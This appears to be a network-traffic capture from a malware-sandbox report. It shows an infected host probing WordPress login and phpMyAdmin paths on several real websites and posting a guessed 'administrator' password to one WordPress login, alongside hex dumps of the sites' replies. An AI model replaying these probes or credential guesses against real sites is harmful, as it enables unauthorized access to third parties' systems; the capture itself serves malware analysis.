2024-02-20 23:26:22 UTC	6786	IN	Data Raw: 32 30 30 30 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 22 6c 74 72 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 65 66 65 72 72 65 72 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 72 65 66 65 72 72 65 72 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 6e 6f 66 6f 6c 6c 6f 77 2c 6e 6f 74 72 61 6e 73 6c Data Ascii: 2000<!doctype html><html lang="en" dir="ltr"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <meta name="referrer" content="no-referrer"> <meta name="robots" content="noindex,nofollow,notransl
2024-02-20 23:26:22 UTC	1412	IN	Data Raw: 65 67 69 6f 6e 61 6c 5b 27 27 5d 2e 6d 69 6e 75 74 65 54 65 78 74 20 3d 20 27 4d 69 6e 75 74 65 27 3b 0a 20 20 24 2e 74 69 6d 65 70 69 63 6b 65 72 2e 72 65 67 69 6f 6e 61 6c 5b 27 27 5d 2e 73 65 63 6f 6e 64 54 65 78 74 20 3d 20 27 53 65 63 6f 6e 64 27 3b 0a 20 20 24 2e 65 78 74 65 6e 64 28 24 2e 74 69 6d 65 70 69 63 6b 65 72 2e 5f 64 65 66 61 75 6c 74 73 2c 20 24 2e 74 69 6d 65 70 69 63 6b 65 72 2e 72 65 67 69 6f 6e 61 6c 5b 27 27 5d 29 3b 0a 7d 0a 0a 66 75 6e 63 74 69 6f 6e 20 65 78 74 65 6e 64 69 6e 67 56 61 6c 69 64 61 74 6f 72 4d 65 73 73 61 67 65 73 20 28 29 20 7b 0a 20 20 24 2e 65 78 74 65 6e 64 28 24 2e 76 61 6c 69 64 61 74 6f 72 2e 6d 65 73 73 61 67 65 73 2c 20 7b 0a 20 20 20 20 72 65 71 75 69 72 65 64 3a 20 27 54 68 69 73 5c 75 30 30 32 30 66 69 Data Ascii: egional[''].minuteText = 'Minute'; $.timepicker.regional[''].secondText = 'Second'; $.extend($.timepicker._defaults, $.timepicker.regional['']);}function extendingValidatorMessages () { $.extend($.validator.messages, { required: 'This\u0020fi
2024-02-20 23:26:22 UTC	2	IN	Data Raw: 0d 0a Data Ascii:
2024-02-20 23:26:23 UTC	8192	IN	Data Raw: 32 30 30 30 0d 0a 31 5c 75 30 30 37 44 27 29 2c 0a 20 20 20 20 6d 61 78 3a 20 24 2e 76 61 6c 69 64 61 74 6f 72 2e 66 6f 72 6d 61 74 28 27 50 6c 65 61 73 65 5c 75 30 30 32 30 65 6e 74 65 72 5c 75 30 30 32 30 61 5c 75 30 30 32 30 76 61 6c 75 65 5c 75 30 30 32 30 6c 65 73 73 5c 75 30 30 32 30 74 68 61 6e 5c 75 30 30 32 30 6f 72 5c 75 30 30 32 30 65 71 75 61 6c 5c 75 30 30 32 30 74 6f 5c 75 30 30 32 30 5c 75 30 30 37 42 30 5c 75 30 30 37 44 27 29 2c 0a 20 20 20 20 6d 69 6e 3a 20 24 2e 76 61 6c 69 64 61 74 6f 72 2e 66 6f 72 6d 61 74 28 27 50 6c 65 61 73 65 5c 75 30 30 32 30 65 6e 74 65 72 5c 75 30 30 32 30 61 5c 75 30 30 32 30 76 61 6c 75 65 5c 75 30 30 32 30 67 72 65 61 74 65 72 5c 75 30 30 32 30 74 68 61 6e 5c 75 30 30 32 30 6f 72 5c 75 30 30 32 30 65 71 75 Data Ascii: 20001\u007D'), max: $.validator.format('Please\u0020enter\u0020a\u0020value\u0020less\u0020than\u0020or\u0020equal\u0020to\u0020\u007B0\u007D'), min: $.validator.format('Please\u0020enter\u0020a\u0020value\u0020greater\u0020than\u0020or\u0020equ
2024-02-20 23:26:23 UTC	6	IN	Data Raw: 20 20 3c 6f 70 74 Data Ascii: <opt
2024-02-20 23:26:23 UTC	2	IN	Data Raw: 0d 0a Data Ascii:
2024-02-20 23:26:23 UTC	2047	IN	Data Raw: 37 65 38 0d 0a 69 6f 6e 20 76 61 6c 75 65 3d 22 73 76 22 3e 53 76 65 6e 73 6b 61 20 2d 20 53 77 65 64 69 73 68 3c 2f 6f 70 74 69 6f 6e 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6f 70 74 69 6f 6e 20 76 61 6c 75 65 3d 22 74 72 22 3e 54 26 75 75 6d 6c 3b 72 6b 26 63 63 65 64 69 6c 3b 65 20 2d 20 54 75 72 6b 69 73 68 3c 2f 6f 70 74 69 6f 6e 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6f 70 74 69 6f 6e 20 76 61 6c 75 65 3d 22 75 6b 22 3e 26 23 31 30 35 39 3b 26 23 31 30 38 32 3b 26 23 31 30 38 38 3b 26 23 31 30 37 32 3b 26 23 31 31 31 31 3b 26 23 31 30 38 35 3b 26 23 31 30 38 39 3b 26 23 31 31 30 30 3b 26 23 31 30 38 32 3b 26 23 31 30 37 32 3b 20 2d 20 55 6b 72 61 69 6e 69 Data Ascii: 7e8ion value="sv">Svenska - Swedish</option> <option value="tr">Türkçe - Turkish</option> <option value="uk">Українська - Ukraini

Session ID	Source IP	Source Port	Destination IP	Destination Port
301	192.168.2.6	57979	13.232.255.130	443

Timestamp	Bytes transferred	Direction	Data
2024-02-20 23:26:22 UTC	181	OUT	GET /wp-login.php HTTP/1.1 Host: amsantechnology.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2024-02-20 23:26:22 UTC	375	IN	HTTP/1.1 200 OK Date: Tue, 20 Feb 2024 23:26:22 GMT Server: Apache Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 X-Frame-Options: SAMEORIGIN Set-Cookie: wordpress_test_cookie=WP%20Cookie%20check; path=/; secure Vary: Accept-Encoding Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8
2024-02-20 23:26:22 UTC	6192	IN	Data Raw: 31 38 32 33 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 09 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 09 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 74 69 74 6c 65 3e 4c 6f 67 20 49 6e 20 26 6c 73 61 71 75 6f 3b 20 41 6d 73 61 6e 20 54 65 63 68 6e 6f 6c 6f 67 79 20 26 23 38 32 31 32 3b 20 57 6f 72 64 50 72 65 73 73 3c 2f 74 69 74 6c 65 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6e 6f 69 6e 64 65 78 2c 20 66 6f 6c 6c 6f 77 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 Data Ascii: 1823<!DOCTYPE html><html lang="en-US"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><title>Log In &lsaquo; Amsan Technology — WordPress</title><meta name='robots' content='noindex, follow' /><link rel='style

Session ID	Source IP	Source Port	Destination IP	Destination Port
302	192.168.2.6	58528	104.21.54.169	443

Timestamp	Bytes transferred	Direction	Data
2024-02-20 23:26:22 UTC	362	OUT	POST /wp-login.php HTTP/1.1 Host: fortressrealcapital.com Accept: / Accept-Encoding: deflate, gzip Cookie: wordpress_test_cookie=WP%20Cookie%20check User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0 Referer: https://fortressrealcapital.com/wp-login.php Content-Length: 146 Content-Type: application/x-www-form-urlencoded
2024-02-20 23:26:22 UTC	146	OUT	Data Raw: 6c 6f 67 3d 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 26 70 77 64 3d 66 6f 72 74 72 65 73 73 25 32 31 26 72 65 6d 65 6d 62 65 72 6d 65 3d 66 6f 72 65 76 65 72 26 77 70 2d 73 75 62 6d 69 74 3d 4c 6f 67 2b 49 6e 26 72 65 64 69 72 65 63 74 5f 74 6f 3d 68 74 74 70 73 25 33 41 25 32 46 25 32 46 66 6f 72 74 72 65 73 73 72 65 61 6c 63 61 70 69 74 61 6c 2e 63 6f 6d 25 32 46 77 70 2d 61 64 6d 69 6e 25 32 46 26 74 65 73 74 63 6f 6f 6b 69 65 3d 31 Data Ascii: log=administrator&pwd=fortress%21&rememberme=forever&wp-submit=Log+In&redirect_to=https%3A%2F%2Ffortressrealcapital.com%2Fwp-admin%2F&testcookie=1
2024-02-20 23:26:23 UTC	810	IN	HTTP/1.1 200 OK Date: Tue, 20 Feb 2024 23:26:23 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 x-frame-options: SAMEORIGIN set-cookie: wordpress_test_cookie=WP%20Cookie%20check; path=/; secure vary: Accept-Encoding CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=%2BhRocw%2FkvTT%2Bz24kmthTdE%2FjF3bdPNTumFMSoHo1J3ApG8QDooFLdWjnXEc5b4P77wTHf7tVdOHU2Hp1lc%2BzRwxkJu642%2F1Am2UU4B0zTzw2eOXEB8uADQZQtyAW0HwqAtLzE2ZaOSzm6w%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 858a83a05d75438d-EWR alt-svc: h3=":443"; ma=86400
2024-02-20 23:26:23 UTC	559	IN	Data Raw: 31 62 63 34 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 09 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 09 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 74 69 74 6c 65 3e 4c 6f 67 20 49 6e 20 26 6c 73 61 71 75 6f 3b 20 46 6f 72 74 72 65 73 73 20 52 65 61 6c 20 43 61 70 69 74 61 6c 20 26 23 38 32 31 32 3b 20 57 6f 72 64 50 72 65 73 73 3c 2f 74 69 74 6c 65 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6e 6f 69 6e 64 65 78 2c 20 66 6f 6c 6c 6f 77 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 Data Ascii: 1bc4<!DOCTYPE html><html lang="en-US"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><title>Log In &lsaquo; Fortress Real Capital — WordPress</title><meta name='robots' content='noindex, follow' /><link rel='
2024-02-20 23:26:23 UTC	1369	IN	Data Raw: 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 69 64 3d 27 66 6f 72 6d 73 2d 63 73 73 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 66 6f 72 74 72 65 73 73 72 65 61 6c 63 61 70 69 74 61 6c 2e 63 6f 6d 2f 77 70 2d 61 64 6d 69 6e 2f 63 73 73 2f 66 6f 72 6d 73 2e 6d 69 6e 2e 63 73 73 3f 76 65 72 3d 36 2e 34 2e 33 27 20 74 79 70 65 3d 27 74 65 78 74 2f 63 73 73 27 20 6d 65 64 69 61 3d 27 61 6c 6c 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 69 64 3d 27 6c 31 30 6e 2d 63 73 73 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 66 6f 72 74 72 65 73 73 72 65 61 6c 63 61 70 69 74 61 6c 2e 63 6f 6d 2f 77 70 2d 61 64 6d 69 6e 2f 63 73 73 2f 6c 31 30 6e 2e 6d 69 6e 2e 63 73 73 3f 76 65 72 3d 36 2e 34 2e 33 27 20 74 79 70 65 3d Data Ascii: el='stylesheet' id='forms-css' href='https://fortressrealcapital.com/wp-admin/css/forms.min.css?ver=6.4.3' type='text/css' media='all' /><link rel='stylesheet' id='l10n-css' href='https://fortressrealcapital.com/wp-admin/css/l10n.min.css?ver=6.4.3' type=
2024-02-20 23:26:23 UTC	1369	IN	Data Raw: 3e 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 6f 72 64 70 72 65 73 73 2e 6f 72 67 2f 22 3e 50 6f 77 65 72 65 64 20 62 79 20 57 6f 72 64 50 72 65 73 73 3c 2f 61 3e 3c 2f 68 31 3e 0a 09 3c 64 69 76 20 69 64 3d 22 6c 6f 67 69 6e 5f 65 72 72 6f 72 22 20 63 6c 61 73 73 3d 22 6e 6f 74 69 63 65 20 6e 6f 74 69 63 65 2d 65 72 72 6f 72 22 3e 3c 70 3e 3c 73 74 72 6f 6e 67 3e 45 72 72 6f 72 3a 3c 2f 73 74 72 6f 6e 67 3e 20 54 68 65 20 75 73 65 72 6e 61 6d 65 20 3c 73 74 72 6f 6e 67 3e 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 3c 2f 73 74 72 6f 6e 67 3e 20 69 73 20 6e 6f 74 20 72 65 67 69 73 74 65 72 65 64 20 6f 6e 20 74 68 69 73 20 73 69 74 65 2e 20 49 66 20 79 6f 75 20 61 72 65 20 75 6e 73 75 72 65 20 6f 66 20 79 6f 75 72 20 75 73 65 72 6e 61 6d 65 2c 20 74 Data Ascii: ><a href="https://wordpress.org/">Powered by WordPress</a></h1><div id="login_error" class="notice notice-error"><p><strong>Error:</strong> The username <strong>administrator</strong> is not registered on this site. If you are unsure of your username, t
2024-02-20 23:26:23 UTC	1369	IN	Data Raw: 65 72 20 4d 65 3c 2f 6c 61 62 65 6c 3e 3c 2f 70 3e 0a 09 09 09 3c 70 20 63 6c 61 73 73 3d 22 73 75 62 6d 69 74 22 3e 0a 09 09 09 09 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 73 75 62 6d 69 74 22 20 6e 61 6d 65 3d 22 77 70 2d 73 75 62 6d 69 74 22 20 69 64 3d 22 77 70 2d 73 75 62 6d 69 74 22 20 63 6c 61 73 73 3d 22 62 75 74 74 6f 6e 20 62 75 74 74 6f 6e 2d 70 72 69 6d 61 72 79 20 62 75 74 74 6f 6e 2d 6c 61 72 67 65 22 20 76 61 6c 75 65 3d 22 4c 6f 67 20 49 6e 22 20 2f 3e 0a 09 09 09 09 09 09 09 09 09 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 68 69 64 64 65 6e 22 20 6e 61 6d 65 3d 22 72 65 64 69 72 65 63 74 5f 74 6f 22 20 76 61 6c 75 65 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 72 74 72 65 73 73 72 65 61 6c 63 61 70 69 74 61 6c 2e 63 6f 6d 2f 77 70 2d 61 64 6d 69 6e 2f Data Ascii: er Me</label></p><p class="submit"><input type="submit" name="wp-submit" id="wp-submit" class="button button-primary button-large" value="Log In" /><input type="hidden" name="redirect_to" value="https://fortressrealcapital.com/wp-admin/
2024-02-20 23:26:23 UTC	1369	IN	Data Raw: 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 69 64 3d 22 7a 78 63 76 62 6e 2d 61 73 79 6e 63 2d 6a 73 2d 65 78 74 72 61 22 3e 0a 2f 2a 20 3c 21 5b 43 44 41 54 41 5b 20 2a 2f 0a 76 61 72 20 5f 7a 78 63 76 62 6e 53 65 74 74 69 6e 67 73 20 3d 20 7b 22 73 72 63 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 66 6f 72 74 72 65 73 73 72 65 61 6c 63 61 70 69 74 61 6c 2e 63 6f 6d 5c 2f 77 70 2d 69 6e 63 6c 75 64 65 73 5c 2f 6a 73 5c 2f 7a 78 63 76 62 6e 2e 6d 69 6e 2e 6a 73 22 7d 3b 0a 2f 2a 20 5d 5d 3e 20 2a 2f 0a 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 72 74 72 65 73 73 72 65 61 6c 63 61 70 69 74 61 6c 2e 63 6f 6d 2f 77 70 2d 69 6e 63 Data Ascii: "text/javascript" id="zxcvbn-async-js-extra">/* <![CDATA[ /var _zxcvbnSettings = {"src":"https:\/\/fortressrealcapital.com\/wp-includes\/js\/zxcvbn.min.js"};/ ... */</script><script type="text/javascript" src="https://fortressrealcapital.com/wp-inc
2024-02-20 23:26:23 UTC	1081	IN	Data Raw: 61 72 20 70 77 73 4c 31 30 6e 20 3d 20 7b 22 75 6e 6b 6e 6f 77 6e 22 3a 22 50 61 73 73 77 6f 72 64 20 73 74 72 65 6e 67 74 68 20 75 6e 6b 6e 6f 77 6e 22 2c 22 73 68 6f 72 74 22 3a 22 56 65 72 79 20 77 65 61 6b 22 2c 22 62 61 64 22 3a 22 57 65 61 6b 22 2c 22 67 6f 6f 64 22 3a 22 4d 65 64 69 75 6d 22 2c 22 73 74 72 6f 6e 67 22 3a 22 53 74 72 6f 6e 67 22 2c 22 6d 69 73 6d 61 74 63 68 22 3a 22 4d 69 73 6d 61 74 63 68 22 7d 3b 0a 2f 2a 20 5d 5d 3e 20 2a 2f 0a 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 72 74 72 65 73 73 72 65 61 6c 63 61 70 69 74 61 6c 2e 63 6f 6d 2f 77 70 2d 61 64 6d 69 6e 2f 6a 73 2f 70 61 73 73 77 6f 72 64 2d 73 74 72 Data Ascii: ar pwsL10n = {"unknown":"Password strength unknown","short":"Very weak","bad":"Weak","good":"Medium","strong":"Strong","mismatch":"Mismatch"};/* ... */</script><script type="text/javascript" src="https://fortressrealcapital.com/wp-admin/js/password-str
2024-02-20 23:26:23 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
303	192.168.2.6	58351	45.147.96.4	443

Timestamp	Bytes transferred	Direction	Data
2024-02-20 23:26:22 UTC	175	OUT	GET /PhpMyAdmin/ HTTP/1.1 Host: glazing-bt.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2024-02-20 23:26:23 UTC	349	IN	HTTP/1.1 301 Moved Permanently Server: nginx Date: Tue, 20 Feb 2024 23:26:23 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Location: https://www.glazing-bt.com Strict-Transport-Security: max-age=31536000
2024-02-20 23:26:23 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
304	192.168.2.6	58352	81.169.145.86	443

Timestamp	Bytes transferred	Direction	Data
2024-02-20 23:26:22 UTC	190	OUT	GET /phpMyAdmin/ HTTP/1.1 Host: creativ-moebelwerkstaetten.de Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2024-02-20 23:26:24 UTC	395	IN	HTTP/1.1 301 Moved Permanently Date: Tue, 20 Feb 2024 23:26:22 GMT Server: Apache/2.4.58 (Unix) X-Powered-By: PHP/8.2.15 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: private, must-revalidate X-Redirect-By: WordPress Vary: User-Agent Location: https://www.creativ-moebelwerkstaetten.de/phpMyAdmin/ Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port
305	192.168.2.6	58355	185.39.146.199	443

Timestamp	Bytes transferred	Direction	Data
2024-02-20 23:26:22 UTC	165	OUT	GET /pma/ HTTP/1.1 Host: markoren.no Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2024-02-20 23:26:23 UTC	774	IN	HTTP/1.1 301 Moved Permanently date: Tue, 20 Feb 2024 23:26:22 GMT expires: Thu, 19 Nov 1981 08:52:00 GMT cache-control: no-store, no-cache, must-revalidate pragma: no-cache set-cookie: PHPSESSID=m80fv5v1ifs8gppip7k0hcjlni; expires=Fri, 10-Jun-2078 22:52:44 GMT; Max-Age=1713655582; path=/; secure; HttpOnly; SameSite=None location: https://www.markoren.no/pma/ access-control-allow-origin: * access-control-allow-methods: GET,POST,OPTIONS,DELETE,PUT access-control-allow-headers: X-Requested-With, Content-Type, Origin, Cache-Control, Pragma, Authorization, Accept, Accept-Encoding, token content-length: 0 content-type: text/html; charset=iso-8859-1 x-backend: server1 x-type: customer x-varnish: 976394886 age: 0 x-server: varnish-2 connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port
306	192.168.2.6	58484	81.169.145.86	443

Timestamp	Bytes transferred	Direction	Data
2024-02-20 23:26:22 UTC	170	OUT	GET /pma/ HTTP/1.1 Host: ksv-schwimmen.de Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2024-02-20 23:26:24 UTC	520	IN	HTTP/1.1 404 Not Found Date: Tue, 20 Feb 2024 23:26:22 GMT Server: Apache/2.4.58 (Unix) X-Powered-By: PHP/8.1.27 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Link: <https://ksv-schwimmen.de/wp-json/>; rel="https://api.w.org/" X-TEC-API-VERSION: v1 X-TEC-API-ROOT: https://ksv-schwimmen.de/wp-json/tribe/events/v1/ X-TEC-API-ORIGIN: https://ksv-schwimmen.de Vary: User-Agent Content-Type: text/html; charset=UTF-8 Connection: close Transfer-Encoding: chunked
2024-02-20 23:26:24 UTC	6722	IN	Data Raw: 31 61 33 61 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 64 65 2d 44 45 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 09 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 20 0d 0a 09 20 3c 74 69 74 6c 65 3e 53 65 69 74 65 20 6e 69 63 68 74 20 67 65 66 75 6e 64 65 6e 20 26 23 38 32 31 31 3b 20 4b 53 56 20 4e 65 70 74 75 6e 20 31 38 38 39 Data Ascii: 1a3a<!DOCTYPE html><html lang="de-DE"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="profile" href="https://gmpg.org/xfn/11"> <title>Seite nicht gefunden – KSV Neptun 1889
2024-02-20 23:26:24 UTC	8192	IN	Data Raw: 35 63 36 0d 0a 31 2e 35 72 65 6d 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 2e 32 65 6d 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 36 30 30 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 27 4c 61 74 6f 27 2c 73 61 6e 73 2d 73 65 72 69 66 3b 7d 68 35 2c 2e 65 6e 74 72 79 2d 63 6f 6e 74 65 6e 74 20 68 35 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 32 35 72 65 6d 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 2e 32 65 6d 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 36 30 30 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 27 4c 61 74 6f 27 2c 73 61 6e 73 2d 73 65 72 69 66 3b 7d 68 36 2c 2e 65 6e 74 72 79 2d 63 6f 6e 74 65 6e 74 20 68 36 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 30 2e 39 33 37 35 72 65 6d 3b 6c 69 6e Data Ascii: 5c61.5rem;line-height:1.2em;font-weight:600;font-family:'Lato',sans-serif;}h5,.entry-content h5{font-size:20px;font-size:1.25rem;line-height:1.2em;font-weight:600;font-family:'Lato',sans-serif;}h6,.entry-content h6{font-size:15px;font-size:0.9375rem;lin
2024-02-20 23:26:24 UTC	1491	IN	Data Raw: 6e 65 72 20 7b 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 30 3b 7d 40 6d 65 64 69 61 20 28 6d 69 6e 2d 77 69 64 74 68 3a 20 39 32 32 70 78 29 20 7b 2e 61 73 74 2d 64 65 73 6b 74 6f 70 20 2e 61 73 74 2d 63 6f 6e 74 61 69 6e 65 72 2d 2d 6e 61 72 72 6f 77 20 7b 6d 61 78 2d 77 69 64 74 68 3a 20 76 61 72 28 2d 2d 61 73 74 2d 6e 61 72 72 6f 77 2d 63 6f 6e 74 61 69 6e 65 72 2d 77 69 64 74 68 29 3b 6d 61 72 67 69 6e 3a 20 30 20 61 75 74 6f 3b 7d 7d 40 6d 65 64 69 61 20 28 6d 61 78 2d 77 69 64 74 68 3a 39 32 31 70 78 29 7b 23 61 73 74 2d 64 65 73 6b 74 6f 70 2d 68 65 61 64 65 72 7b 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 3b 7d 7d 40 6d 65 64 69 61 20 28 6d 69 6e 2d 77 69 64 74 68 3a 39 32 32 70 78 29 7b 23 61 73 74 2d 6d 6f 62 69 6c 65 2d 68 65 61 64 65 72 7b 64 69 73 70 6c Data Ascii: ner {margin-top: 0;}@media (min-width: 922px) {.ast-desktop .ast-container--narrow {max-width: var(--ast-narrow-container-width);margin: 0 auto;}}@media (max-width:921px){#ast-desktop-header{display:none;}}@media (min-width:922px){#ast-mobile-header{displ
2024-02-20 23:26:24 UTC	2	IN	Data Raw: 0d 0a Data Ascii:
2024-02-20 23:26:24 UTC	6282	IN	Data Raw: 31 38 38 32 0d 0a 70 2d 65 6c 65 6d 65 6e 74 2d 62 75 74 74 6f 6e 2c 2e 61 73 74 2d 6f 75 74 6c 69 6e 65 2d 62 75 74 74 6f 6e 7b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 23 30 30 30 30 30 30 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 69 6e 68 65 72 69 74 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 69 6e 68 65 72 69 74 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 65 6d 3b 62 6f 72 64 65 72 2d 74 6f 70 2d 6c 65 66 74 2d 72 61 64 69 75 73 3a 33 30 70 78 3b 62 6f 72 64 65 72 2d 74 6f 70 2d 72 69 67 68 74 2d 72 61 64 69 75 73 3a 33 30 70 78 3b 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 2d 72 69 67 68 74 2d 72 61 64 69 75 73 3a 33 30 70 78 3b 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 2d 6c 65 66 74 2d 72 61 64 69 75 73 3a 33 30 70 78 3b 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 62 75 74 74 Data Ascii: 1882p-element-button,.ast-outline-button{border-color:#000000;font-family:inherit;font-weight:inherit;line-height:1em;border-top-left-radius:30px;border-top-right-radius:30px;border-bottom-right-radius:30px;border-bottom-left-radius:30px;}.wp-block-butt
